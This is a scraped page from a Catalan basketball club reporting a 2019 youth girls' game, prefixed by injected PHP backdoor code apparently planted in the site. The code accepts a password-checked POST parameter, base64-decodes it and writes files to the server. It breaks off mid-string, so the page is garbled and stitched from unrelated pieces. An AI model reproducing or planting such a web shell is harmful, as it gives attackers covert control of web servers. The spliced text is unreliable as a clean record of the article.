function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El preinfantil femení 07 negre fa un gran partit i derrota el fins ara invicte Salle Ploms (28-37) - Tgn Bàsquet Club -

El preinfantil femení 07 negre fa un gran partit i derrota el fins ara invicte Salle Ploms (28-37)

Updated: octubre 22, 2019

L’equip preinfantil femení 07 negre va trencar la imbatibilitat del Salle Ploms en un partit que es va decidir en el tercer quart. El conjunt tarragoní, que va sortir prou bé, va sobreposar-se a les errades en tirs còmodes sota la cistella gràcies a una gran defensa que va deixar les locals amb només 12 punts en els 30 primers minuts (1-8 de parcial en el tercer quart). Aquesta bona feina defensiva va ser fonamental per aconseguir el triomf.